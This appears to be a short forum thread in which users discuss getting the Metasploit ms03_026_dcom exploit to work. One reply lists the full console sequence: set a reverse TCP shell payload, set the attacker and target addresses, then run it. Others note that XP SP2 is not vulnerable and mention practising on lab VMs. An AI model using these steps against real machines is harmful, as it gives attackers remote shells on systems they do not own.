Re: exploit(ms03_026_dcom)
just to let you know but the correct way to use this is[
Code:
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > show payloads
msf exploit(ms03_026_dcom) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(ms03_026_dcom) > set LHOST [MY IP ADDRESS]
msf exploit(ms03_026_dcom) > set RHOST [TARGET IP]
msf exploit(ms03_026_dcom) > exploit
we so the offical site says anyways , good luck .
HERES LINK FOR YOU
Re: exploit(ms03_026_dcom)
Thanks loveablerouge for your kind reply, but still the same :)
Can anyone advise?
Re: exploit(ms03_026_dcom)
According to this, Windows XP Professional SP2 is not vulnerable: http://www.securityfocus.com/bid/8205
Re: exploit(ms03_026_dcom)
yes, you are right shadowzero.
thanks man
Re: exploit(ms03_026_dcom)
this is what I was looking for! I got BT5R3 and have xp vista and other vms set up for attack and didn't really know how to execute after running exploit!